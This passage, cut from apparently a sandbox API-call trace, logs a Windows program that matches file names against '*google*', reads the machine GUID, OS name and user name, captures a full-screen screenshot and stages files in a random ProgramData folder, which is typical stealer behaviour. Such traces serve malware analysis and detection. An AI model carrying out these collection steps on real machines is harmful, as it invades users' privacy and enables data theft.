pszSpec="*google*.*") returned 0 [0110.995] PathMatchSpecW (pszFile="SSkrbDuTIF.m4a", pszSpec="*google*.*") returned 0 [0110.995] PathMatchSpecW (pszFile="StgqeHlfrw0.m4a", pszSpec="*google*.*") returned 0 [0110.995] PathMatchSpecW (pszFile="SWeD.odt", pszSpec="*google*.*") returned 0 [0110.995] PathMatchSpecW (pszFile="UQk58h 9TQk7yvi7D.mkv", pszSpec="*google*.*") returned 0 [0110.995] PathMatchSpecW (pszFile="VAHC8zDa9SevTeoKicIh.docx", pszSpec="*google*.*") returned 0 [0110.995] PathMatchSpecW (pszFile="VbI-8gh.mkv", pszSpec="*google*.*") returned 0 [0110.999] WriteFile (in: hFile=0x358, lpBuffer=0x19d42b*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d3fc, lpOverlapped=0x0 | out: lpBuffer=0x19d42b*, lpNumberOfBytesWritten=0x19d3fc*=0x1, lpOverlapped=0x0) returned 1 [0110.999] WriteFile (in: hFile=0x358, lpBuffer=0x19d444*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d3f0, lpOverlapped=0x0 | out: lpBuffer=0x19d444*, lpNumberOfBytesWritten=0x19d3f0*=0x1, lpOverlapped=0x0) returned 1 [0110.999] WriteFile (in: hFile=0x358, lpBuffer=0x19d444*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d3e4, lpOverlapped=0x0 | out: lpBuffer=0x19d444*, lpNumberOfBytesWritten=0x19d3e4*=0x1, lpOverlapped=0x0) returned 1 [0110.999] WriteFile (in: hFile=0x358, lpBuffer=0x19d444*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d3d8, lpOverlapped=0x0 | out: lpBuffer=0x19d444*, lpNumberOfBytesWritten=0x19d3d8*=0x1, lpOverlapped=0x0) returned 1 [0110.999] WriteFile (in: hFile=0x358, lpBuffer=0x19d444*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d3cc, lpOverlapped=0x0 | out: lpBuffer=0x19d444*, lpNumberOfBytesWritten=0x19d3cc*=0x1, lpOverlapped=0x0) returned 1 [0110.999] WriteFile (in: hFile=0x358, lpBuffer=0x19d444*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d408, lpOverlapped=0x0 | out: lpBuffer=0x19d444*, lpNumberOfBytesWritten=0x19d408*=0x1, lpOverlapped=0x0) returned 1 [0110.999] WriteFile (in: hFile=0x358, lpBuffer=0x19d444*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d3fc, lpOverlapped=0x0 | out: lpBuffer=0x19d444*, lpNumberOfBytesWritten=0x19d3fc*=0x1, lpOverlapped=0x0) returned 1 [0110.999] WriteFile (in: hFile=0x358, lpBuffer=0x19d444*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d3f0, lpOverlapped=0x0 | out: lpBuffer=0x19d444*, lpNumberOfBytesWritten=0x19d3f0*=0x1, lpOverlapped=0x0) returned 1 [0111.000] WriteFile (in: hFile=0x358, lpBuffer=0x19d444*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d3e4, lpOverlapped=0x0 | out: lpBuffer=0x19d444*, lpNumberOfBytesWritten=0x19d3e4*=0x1, lpOverlapped=0x0) returned 1 [0111.000] WriteFile (in: hFile=0x358, lpBuffer=0x19d430*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d3d8, lpOverlapped=0x0 | out: lpBuffer=0x19d430*, lpNumberOfBytesWritten=0x19d3d8*=0x1, lpOverlapped=0x0) returned 1 [0111.000] WriteFile (in: hFile=0x358, lpBuffer=0x19d430*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d3cc, lpOverlapped=0x0 | out: lpBuffer=0x19d430*, lpNumberOfBytesWritten=0x19d3cc*=0x1, lpOverlapped=0x0) returned 1 [0111.000] WriteFile (in: hFile=0x358, lpBuffer=0x19d430*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d408, lpOverlapped=0x0 | out: lpBuffer=0x19d430*, lpNumberOfBytesWritten=0x19d408*=0x1, lpOverlapped=0x0) returned 1 [0111.000] WriteFile (in: hFile=0x358, lpBuffer=0x19d430*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d3fc, lpOverlapped=0x0 | out: lpBuffer=0x19d430*, lpNumberOfBytesWritten=0x19d3fc*=0x1, lpOverlapped=0x0) returned 1 [0111.000] WriteFile (in: hFile=0x358, lpBuffer=0x19d430*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d3f0, lpOverlapped=0x0 | out: lpBuffer=0x19d430*, lpNumberOfBytesWritten=0x19d3f0*=0x1, lpOverlapped=0x0) returned 1 [0111.000] WriteFile (in: hFile=0x358, lpBuffer=0x19d430*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d3e4, lpOverlapped=0x0 | out: lpBuffer=0x19d430*, lpNumberOfBytesWritten=0x19d3e4*=0x1, lpOverlapped=0x0) returned 1 [0111.000] WriteFile (in: hFile=0x358, lpBuffer=0x19d430*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d3d8, lpOverlapped=0x0 | out: lpBuffer=0x19d430*, lpNumberOfBytesWritten=0x19d3d8*=0x1, lpOverlapped=0x0) returned 1 [0111.000] WriteFile (in: hFile=0x358, lpBuffer=0x19d430*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d3cc, lpOverlapped=0x0 | out: lpBuffer=0x19d430*, lpNumberOfBytesWritten=0x19d3cc*=0x1, lpOverlapped=0x0) returned 1 [0111.000] WriteFile (in: hFile=0x358, lpBuffer=0x19d430*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d408, lpOverlapped=0x0 | out: lpBuffer=0x19d430*, lpNumberOfBytesWritten=0x19d408*=0x1, lpOverlapped=0x0) returned 1 [0111.000] WriteFile (in: hFile=0x358, lpBuffer=0x19d430*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d3fc, lpOverlapped=0x0 | out: lpBuffer=0x19d430*, lpNumberOfBytesWritten=0x19d3fc*=0x1, lpOverlapped=0x0) returned 1 [0111.001] WriteFile (in: hFile=0x358, lpBuffer=0x19d430*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d3f0, lpOverlapped=0x0 | out: lpBuffer=0x19d430*, lpNumberOfBytesWritten=0x19d3f0*=0x1, lpOverlapped=0x0) returned 1 [0111.001] WriteFile (in: hFile=0x358, lpBuffer=0x19d430*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19d3e4, lpOverlapped=0x0 | out: lpBuffer=0x19d430*, lpNumberOfBytesWritten=0x19d3e4*=0x1, lpOverlapped=0x0) returned 1 [0111.001] CloseHandle (hObject=0x358) returned 1 [0111.004] SetCurrentDirectoryA (lpPathName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files")) returned 1 [0111.071] GetCurrentHwProfileA (in: lpHwProfileInfo=0x19f59c | out: lpHwProfileInfo=0x19f59c) returned 1 [0111.072] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x19f414 | out: phkResult=0x19f414*=0x518) returned 0x0 [0111.072] RegQueryValueExA (in: hKey=0x518, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x19f418, lpcbData=0x19f410*=0xff | out: lpType=0x0, lpData=0x19f418*=0x30, lpcbData=0x19f410*=0x25) returned 0x0 [0111.072] RegCloseKey (hKey=0x518) returned 0x0 [0111.072] CharToOemA (in: pSrc="03845cb8-7441-4a2f-8c0f-c90408af5778", pDst=0x19f518 | out: pDst="03845cb8-7441-4a2f-8c0f-c90408af5778") returned 1 [0111.072] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x19f4d4 | out: phkResult=0x19f4d4*=0x518) returned 0x0 [0111.072] RegQueryValueExA (in: hKey=0x518, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0x19f4d8, lpcbData=0x19f4d0*=0xff | out: lpType=0x0, lpData=0x19f4d8*=0x57, lpcbData=0x19f4d0*=0xf) returned 0x0 [0111.073] RegCloseKey (hKey=0x518) returned 0x0 [0111.073] CharToOemA (in: pSrc="Windows 10 Pro", pDst=0x19f5d8 | out: pDst="Windows 10 Pro") returned 1 [0111.073] GetCurrentProcess () returned 0xffffffff [0111.073] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19f6d8 | out: Wow64Process=0x19f6d8*=1) returned 1 [0111.073] GetUserNameA (in: lpBuffer=0x19f5d4, pcbBuffer=0x19f5d0 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19f5d0) returned 1 [0111.073] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6808 [0111.073] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970f20 [0111.073] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6838 [0111.074] GetLastError () returned 0x3 [0111.074] SetLastError (dwErrCode=0x3) [0111.074] GetLastError () returned 0x3 [0111.074] SetLastError (dwErrCode=0x3) [0111.074] GetLastError () returned 0x3 [0111.074] SetLastError (dwErrCode=0x3) [0111.074] GetLastError () returned 0x3 [0111.074] SetLastError (dwErrCode=0x3) [0111.074] GetLastError () returned 0x3 [0111.074] SetLastError (dwErrCode=0x3) [0111.074] GetLastError () returned 0x3 [0111.074] SetLastError (dwErrCode=0x3) [0111.074] GetLastError () returned 0x3 [0111.074] SetLastError (dwErrCode=0x3) [0111.075] GetLastError () returned 0x3 [0111.075] SetLastError (dwErrCode=0x3) [0111.075] GetLastError () returned 0x3 [0111.075] SetLastError (dwErrCode=0x3) [0111.075] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703a8 [0111.075] GetLastError () returned 0x3 [0111.075] SetLastError (dwErrCode=0x3) [0111.075] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703a8 | out: hHeap=0x29a0000) returned 1 [0111.075] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6838 | out: hHeap=0x29a0000) returned 1 [0111.075] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f20 | out: hHeap=0x29a0000) returned 1 [0111.075] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6808 | out: hHeap=0x29a0000) returned 1 [0111.075] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6828 [0111.075] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970f20 [0111.075] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6838 [0111.076] GetLastError () returned 0x3 [0111.076] SetLastError (dwErrCode=0x3) [0111.076] GetLastError () returned 0x3 [0111.076] SetLastError (dwErrCode=0x3) [0111.076] GetLastError () returned 0x3 [0111.076] SetLastError (dwErrCode=0x3) [0111.076] GetLastError () returned 0x3 [0111.076] SetLastError (dwErrCode=0x3) [0111.076] GetLastError () returned 0x3 [0111.076] SetLastError (dwErrCode=0x3) [0111.076] GetLastError () returned 0x3 [0111.076] SetLastError (dwErrCode=0x3) [0111.076] GetLastError () returned 0x3 [0111.076] SetLastError (dwErrCode=0x3) [0111.076] GetLastError () returned 0x3 [0111.076] SetLastError (dwErrCode=0x3) [0111.076] GetLastError () returned 0x3 [0111.076] SetLastError (dwErrCode=0x3) [0111.077] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970420 [0111.077] GetLastError () returned 0x3 [0111.077] SetLastError (dwErrCode=0x3) [0111.077] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970420 | out: hHeap=0x29a0000) returned 1 [0111.077] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6838 | out: hHeap=0x29a0000) returned 1 [0111.077] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f20 | out: hHeap=0x29a0000) returned 1 [0111.077] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6828 | out: hHeap=0x29a0000) returned 1 [0111.077] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69a8 [0111.077] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970d60 [0111.077] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69b8 [0111.077] GetLastError () returned 0x3 [0111.078] SetLastError (dwErrCode=0x3) [0111.078] GetLastError () returned 0x3 [0111.078] SetLastError (dwErrCode=0x3) [0111.078] GetLastError () returned 0x3 [0111.078] SetLastError (dwErrCode=0x3) [0111.078] GetLastError () returned 0x3 [0111.078] SetLastError (dwErrCode=0x3) [0111.078] GetLastError () returned 0x3 [0111.078] SetLastError (dwErrCode=0x3) [0111.078] GetLastError () returned 0x3 [0111.078] SetLastError (dwErrCode=0x3) [0111.078] GetLastError () returned 0x3 [0111.078] SetLastError (dwErrCode=0x3) [0111.078] GetLastError () returned 0x3 [0111.078] SetLastError (dwErrCode=0x3) [0111.078] GetLastError () returned 0x3 [0111.078] SetLastError (dwErrCode=0x3) [0111.078] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0111.078] GetLastError () returned 0x3 [0111.079] SetLastError (dwErrCode=0x3) [0111.079] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0111.079] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69b8 | out: hHeap=0x29a0000) returned 1 [0111.079] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d60 | out: hHeap=0x29a0000) returned 1 [0111.079] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69a8 | out: hHeap=0x29a0000) returned 1 [0111.079] GdiplusStartup (in: token=0x19f6cc, input=0x19f6d0, output=0x0 | out: token=0x19f6cc, output=0x0) returned 0x0 [0111.099] GetSystemMetrics (nIndex=0) returned 1440 [0111.099] GetSystemMetrics (nIndex=1) returned 900 [0111.099] CreateCompatibleDC (hdc=0x0) returned 0xf010859 [0111.099] GetDC (hWnd=0x0) returned 0x401018d [0111.099] CreateCompatibleBitmap (hdc=0x401018d, cx=1440, cy=900) returned 0x6305098c [0111.188] SelectObject (hdc=0xf010859, h=0x6305098c) returned 0x185000f [0111.188] GetDC (hWnd=0x0) returned 0x200106a4 [0111.189] BitBlt (hdc=0xf010859, x=0, y=0, cx=1440, cy=900, hdcSrc=0x200106a4, x1=0, y1=0, rop=0xcc0020) returned 1 [0111.507] GdipAlloc (size=0x10) returned 0x3e51f08 [0111.508] GdipCreateBitmapFromHBITMAP (hbm=0x6305098c, hpal=0x0, bitmap=0x19f678) returned 0x0 [0112.025] GdipGetImageEncodersSize (numEncoders=0x19f65c, size=0x19f660) returned 0x0 [0112.027] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x410) returned 0x29a79f8 [0112.028] GdipGetImageEncoders (in: numEncoders=0x5, size=0x410, encoders=0x29a79f8 | out: encoders=0x29a79f8) returned 0x0 [0112.028] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a79f8 | out: hHeap=0x29a0000) returned 1 [0112.028] GdipSaveImageToFile (image=0x3e51f20, filename="screenshot.jpg", clsidEncoder=0x19f67c*(Data1=0x557cf401, Data2=0x1a04, Data3=0x11d3, Data4=([0]=0x9a, [1]=0x73, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x1e, [6]=0xf3, [7]=0x2e)), encoderParams=0x0) returned 0x0 [0113.850] GdipDisposeImage (image=0x3e51f20) returned 0x0 [0113.907] GdipFree (ptr=0x3e51f08) [0113.907] DeleteObject (ho=0x6305098c) returned 1 [0113.907] GdiplusShutdown (token=0x122f4ae) [0115.929] SetCurrentDirectoryA (lpPathName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1")) returned 1 [0115.931] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa) returned 0x29aac30 [0115.932] GetTickCount () returned 0x1230799 [0115.932] GetLastError () returned 0x0 [0115.932] SetLastError (dwErrCode=0x0) [0115.932] GetLastError () returned 0x0 [0115.932] SetLastError (dwErrCode=0x0) [0115.932] GetLastError () returned 0x0 [0115.932] SetLastError (dwErrCode=0x0) [0115.932] GetLastError () returned 0x0 [0115.932] SetLastError (dwErrCode=0x0) [0115.932] GetLastError () returned 0x0 [0115.932] SetLastError (dwErrCode=0x0) [0115.932] GetLastError () returned 0x0 [0115.933] SetLastError (dwErrCode=0x0) [0115.933] GetLastError () returned 0x0 [0115.933] SetLastError (dwErrCode=0x0) [0115.933] GetLastError () returned 0x0 [0115.933] SetLastError (dwErrCode=0x0) [0115.933] GetLastError () returned 0x0 [0115.933] SetLastError (dwErrCode=0x0) [0115.933] GetLastError () returned 0x0 [0115.933] SetLastError (dwErrCode=0x0) [0115.933] GetLastError () returned 0x0 [0115.933] SetLastError (dwErrCode=0x0) [0115.933] GetLastError () returned 0x0 [0115.933] SetLastError (dwErrCode=0x0) [0115.933] GetLastError () returned 0x0 [0115.933] SetLastError (dwErrCode=0x0) [0115.933] GetLastError () returned 0x0 [0115.933] SetLastError (dwErrCode=0x0) [0115.933] GetLastError () returned 0x0 [0115.933] SetLastError (dwErrCode=0x0) [0115.934] GetLastError () returned 0x0 [0115.934] SetLastError (dwErrCode=0x0) [0115.934] GetLastError () returned 0x0 [0115.934] SetLastError (dwErrCode=0x0) [0115.934] GetLastError () returned 0x0 [0115.934] SetLastError (dwErrCode=0x0) [0115.934] GetLastError () returned 0x0 [0115.934] SetLastError (dwErrCode=0x0) [0115.934] GetLastError () returned 0x0 [0115.934] SetLastError (dwErrCode=0x0) [0115.934] GetLastError () returned 0x0 [0115.934] SetLastError (dwErrCode=0x0) [0115.934] GetLastError () returned 0x0 [0115.934] SetLastError (dwErrCode=0x0) [0115.934] GetLastError () returned 0x0 [0115.934] SetLastError (dwErrCode=0x0) [0115.934] GetLastError () returned 0x0 [0115.934] SetLastError (dwErrCode=0x0) [0115.934] GetLastError () returned 0x0 [0115.934] SetLastError (dwErrCode=0x0) [0115.934] GetLastError () returned 0x0 [0115.934] SetLastError (dwErrCode=0x0) [0115.935] GetLastError () returned 0x0 [0115.935] SetLastError (dwErrCode=0x0) [0115.935] GetLastError () returned 0x0 [0115.935] SetLastError (dwErrCode=0x0) [0115.935] GetLastError () returned 0x0 [0115.935] SetLastError (dwErrCode=0x0) [0115.935] GetLastError () returned 0x0 [0115.935] SetLastError (dwErrCode=0x0) [0115.935] GetLastError () returned 0x0 [0115.935] SetLastError (dwErrCode=0x0) [0115.935] GetLastError () returned 0x0 [0115.935] SetLastError (dwErrCode=0x0) [0115.935] GetLastError () returned 0x0 [0115.935] SetLastError (dwErrCode=0x0) [0115.935] GetLastError () returned 0x0 [0115.935] SetLastError (dwErrCode=0x0) [0115.935] GetLastError () returned 0x0 [0115.935] SetLastError (dwErrCode=0x0) [0115.935] GetLastError () returned 0x0 [0115.936] SetLastError (dwErrCode=0x0) [0115.936] GetLastError () returned 0x0 [0115.936] SetLastError (dwErrCode=0x0) [0115.936] GetLastError () returned 0x0 [0115.936] SetLastError (dwErrCode=0x0) [0115.936] GetLastError () returned 0x0 [0115.936] SetLastError (dwErrCode=0x0) [0115.936] GetLastError () returned 0x0 [0115.936] SetLastError (dwErrCode=0x0) [0115.936] GetLastError () returned 0x0 [0115.936] SetLastError (dwErrCode=0x0) [0115.936] GetLastError () returned 0x0 [0115.936] SetLastError (dwErrCode=0x0) [0115.936] GetLastError () returned 0x0 [0115.936] SetLastError (dwErrCode=0x0) [0115.936] GetLastError () returned 0x0 [0115.936] SetLastError (dwErrCode=0x0) [0115.936] GetLastError () returned 0x0 [0115.936] SetLastError (dwErrCode=0x0) [0115.936] GetLastError () returned 0x0 [0115.936] SetLastError (dwErrCode=0x0) [0115.936] GetLastError () returned 0x0 [0115.937] SetLastError (dwErrCode=0x0) [0115.937] GetLastError () returned 0x0 [0115.937] SetLastError (dwErrCode=0x0) [0115.937] GetLastError () returned 0x0 [0115.937] SetLastError (dwErrCode=0x0) [0115.937] GetLastError () returned 0x0 [0115.937] SetLastError (dwErrCode=0x0) [0115.937] GetLastError () returned 0x0 [0115.937] SetLastError (dwErrCode=0x0) [0115.937] GetLastError () returned 0x0 [0115.937] SetLastError (dwErrCode=0x0) [0115.937] GetLastError () returned 0x0 [0115.937] SetLastError (dwErrCode=0x0) [0115.937] GetLastError () returned 0x0 [0115.937] SetLastError (dwErrCode=0x0) [0115.937] GetLastError () returned 0x0 [0115.937] SetLastError (dwErrCode=0x0) [0115.937] GetLastError () returned 0x0 [0115.937] SetLastError (dwErrCode=0x0) [0115.937] GetLastError () returned 0x0 [0115.937] SetLastError (dwErrCode=0x0) [0115.937] GetLastError () returned 0x0 [0115.938] SetLastError (dwErrCode=0x0) [0115.938] GetLastError () returned 0x0 [0115.938] SetLastError (dwErrCode=0x0) [0115.938] GetLastError () returned 0x0 [0115.938] SetLastError (dwErrCode=0x0) [0115.938] GetLastError () returned 0x0 [0115.938] SetLastError (dwErrCode=0x0) [0115.938] GetLastError () returned 0x0 [0115.938] SetLastError (dwErrCode=0x0) [0115.938] GetLastError () returned 0x0 [0115.938] SetLastError (dwErrCode=0x0) [0115.938] GetLastError () returned 0x0 [0115.938] SetLastError (dwErrCode=0x0) [0115.938] GetLastError () returned 0x0 [0115.938] SetLastError (dwErrCode=0x0) [0115.938] GetLastError () returned 0x0 [0115.938] SetLastError (dwErrCode=0x0) [0115.938] GetLastError () returned 0x0 [0115.938] SetLastError (dwErrCode=0x0) [0115.938] GetLastError () returned 0x0 [0115.938] SetLastError (dwErrCode=0x0) [0115.938] GetLastError () returned 0x0 [0115.939] SetLastError (dwErrCode=0x0) [0115.939] GetLastError () returned 0x0 [0115.939] SetLastError (dwErrCode=0x0) [0115.939] GetLastError () returned 0x0 [0115.939] SetLastError (dwErrCode=0x0) [0115.939] GetLastError () returned 0x0 [0115.939] SetLastError (dwErrCode=0x0) [0115.939] GetLastError () returned 0x0 [0115.939] SetLastError (dwErrCode=0x0) [0115.939] GetLastError () returned 0x0 [0115.939] SetLastError (dwErrCode=0x0) [0115.939] GetLastError () returned 0x0 [0115.939] SetLastError (dwErrCode=0x0) [0115.939] GetLastError () returned 0x0 [0115.939] SetLastError (dwErrCode=0x0) [0115.939] GetLastError () returned 0x0 [0115.939] SetLastError (dwErrCode=0x0) [0115.939] GetLastError () returned 0x0 [0115.939] SetLastError (dwErrCode=0x0) [0115.939] GetLastError () returned 0x0 [0115.939] SetLastError (dwErrCode=0x0) [0115.939] GetLastError () returned 0x0 [0115.940] SetLastError (dwErrCode=0x0) [0115.940] GetLastError () returned 0x0 [0115.940] SetLastError (dwErrCode=0x0) [0115.940] GetLastError () returned 0x0 [0115.940] SetLastError (dwErrCode=0x0) [0115.940] GetLastError () returned 0x0 [0115.940] SetLastError (dwErrCode=0x0) [0115.940] GetLastError () returned 0x0 [0115.940] SetLastError (dwErrCode=0x0) [0115.940] GetLastError () returned 0x0 [0115.940] SetLastError (dwErrCode=0x0) [0115.940] GetLastError () returned 0x0 [0115.940] SetLastError (dwErrCode=0x0) [0115.940] GetLastError () returned 0x0 [0115.940] SetLastError (dwErrCode=0x0) [0115.940] GetLastError () returned 0x0 [0115.940] SetLastError (dwErrCode=0x0) [0115.940] GetLastError () returned 0x0 [0115.940] SetLastError (dwErrCode=0x0) [0115.940] GetLastError () returned 0x0 [0115.940] SetLastError (dwErrCode=0x0) [0115.940] GetLastError () returned 0x0 [0115.941] SetLastError (dwErrCode=0x0) [0115.941] GetLastError () returned 0x0 [0115.941] SetLastError (dwErrCode=0x0) [0115.941] GetLastError () returned 0x0 [0115.941] SetLastError (dwErrCode=0x0) [0115.941] GetLastError () returned 0x0 [0115.941] SetLastError (dwErrCode=0x0) [0115.941] GetLastError () returned 0x0 [0115.941] SetLastError (dwErrCode=0x0) [0115.941] GetLastError () returned 0x0 [0115.941] SetLastError (dwErrCode=0x0) [0115.941] GetLastError () returned 0x0 [0115.941] SetLastError (dwErrCode=0x0) [0115.941] GetLastError () returned 0x0 [0115.941] SetLastError (dwErrCode=0x0) [0115.941] GetLastError () returned 0x0 [0115.941] SetLastError (dwErrCode=0x0) [0115.941] GetLastError () returned 0x0 [0115.941] SetLastError (dwErrCode=0x0) [0115.941] GetLastError () returned 0x0 [0115.941] SetLastError (dwErrCode=0x0) [0115.941] GetLastError () returned 0x0 [0115.942] SetLastError (dwErrCode=0x0) [0115.942] GetLastError () returned 0x0 [0115.942] SetLastError (dwErrCode=0x0) [0115.942] GetLastError () returned 0x0 [0115.942] SetLastError (dwErrCode=0x0) [0115.942] GetLastError () returned 0x0 [0115.942] SetLastError (dwErrCode=0x0) [0115.942] GetLastError () returned 0x0 [0115.942] SetLastError (dwErrCode=0x0) [0115.942] GetLastError () returned 0x0 [0115.942] SetLastError (dwErrCode=0x0) [0115.942] GetLastError () returned 0x0 [0115.942] SetLastError (dwErrCode=0x0) [0115.942] GetLastError () returned 0x0 [0115.942] SetLastError (dwErrCode=0x0) [0115.942] GetLastError () returned 0x0 [0115.942] SetLastError (dwErrCode=0x0) [0115.942] GetLastError () returned 0x0 [0115.942] SetLastError (dwErrCode=0x0) [0115.942] GetLastError () returned 0x0 [0115.942] SetLastError (dwErrCode=0x0) [0115.942] GetLastError () returned 0x0 [0115.943] SetLastError (dwErrCode=0x0) [0115.943] GetLastError () returned 0x0 [0115.943] SetLastError (dwErrCode=0x0) [0115.943] GetLastError () returned 0x0 [0115.943] SetLastError (dwErrCode=0x0) [0115.943] GetLastError () returned 0x0 [0115.943] SetLastError (dwErrCode=0x0) [0115.943] GetLastError () returned 0x0 [0115.943] SetLastError (dwErrCode=0x0) [0115.943] GetLastError () returned 0x0 [0115.943] SetLastError (dwErrCode=0x0) [0115.943] GetLastError () returned 0x0 [0115.943] SetLastError (dwErrCode=0x0) [0115.943] GetLastError () returned 0x0 [0115.943] SetLastError (dwErrCode=0x0) [0115.943] GetLastError () returned 0x0 [0115.943] SetLastError (dwErrCode=0x0) [0115.943] GetLastError () returned 0x0 [0115.943] SetLastError (dwErrCode=0x0) [0115.943] GetLastError () returned 0x0 [0115.944] SetLastError (dwErrCode=0x0) [0115.944] GetLastError () returned 0x0 [0115.944] SetLastError (dwErrCode=0x0) [0115.944] GetLastError () returned 0x0 [0115.944] SetLastError (dwErrCode=0x0) [0115.944] GetLastError () returned 0x0 [0115.944] SetLastError (dwErrCode=0x0) [0115.944] GetLastError () returned 0x0 [0115.944] SetLastError (dwErrCode=0x0) [0115.944] GetLastError () returned 0x0 [0115.944] SetLastError (dwErrCode=0x0) [0115.944] GetLastError () returned 0x0 [0115.944] SetLastError (dwErrCode=0x0) [0115.944] GetLastError () returned 0x0 [0115.944] SetLastError (dwErrCode=0x0) [0115.944] GetLastError () returned 0x0 [0115.944] SetLastError (dwErrCode=0x0) [0115.944] GetLastError () returned 0x0 [0115.944] SetLastError (dwErrCode=0x0) [0115.944] GetLastError () returned 0x0 [0115.944] SetLastError (dwErrCode=0x0) [0115.944] GetLastError () returned 0x0 [0115.945] SetLastError (dwErrCode=0x0) [0115.945] GetLastError () returned 0x0 [0115.945] SetLastError (dwErrCode=0x0) [0115.945] GetLastError () returned 0x0 [0115.945] SetLastError (dwErrCode=0x0) [0115.945] GetLastError () returned 0x0 [0115.945] SetLastError (dwErrCode=0x0) [0115.945] GetLastError () returned 0x0 [0115.945] SetLastError (dwErrCode=0x0) [0115.945] GetLastError () returned 0x0 [0115.945] SetLastError (dwErrCode=0x0) [0115.945] GetLastError () returned 0x0 [0115.945] SetLastError (dwErrCode=0x0) [0115.945] GetLastError () returned 0x0 [0115.945] SetLastError (dwErrCode=0x0) [0115.945] GetLastError () returned 0x0 [0115.945] SetLastError (dwErrCode=0x0) [0115.945] GetLastError () returned 0x0 [0115.945] SetLastError (dwErrCode=0x0) [0115.945] GetLastError () returned 0x0 [0115.946] SetLastError (dwErrCode=0x0) [0115.946] GetLastError () returned 0x0 [0115.946] SetLastError (dwErrCode=0x0) [0115.946] GetLastError () returned 0x0 [0115.946] SetLastError (dwErrCode=0x0) [0115.946] GetLastError () returned 0x0 [0115.946] SetLastError (dwErrCode=0x0) [0115.946] GetLastError () returned 0x0 [0115.946] SetLastError (dwErrCode=0x0) [0115.946] GetLastError () returned 0x0 [0115.946] SetLastError (dwErrCode=0x0) [0115.946] GetLastError () returned 0x0 [0115.946] SetLastError (dwErrCode=0x0) [0115.946] GetLastError () returned 0x0 [0115.946] SetLastError (dwErrCode=0x0) [0115.946] GetLastError () returned 0x0 [0115.946] SetLastError (dwErrCode=0x0) [0115.946] GetLastError () returned 0x0 [0115.946] SetLastError (dwErrCode=0x0) [0115.946] GetLastError () returned 0x0 [0115.946] SetLastError (dwErrCode=0x0) [0115.946] GetLastError () returned 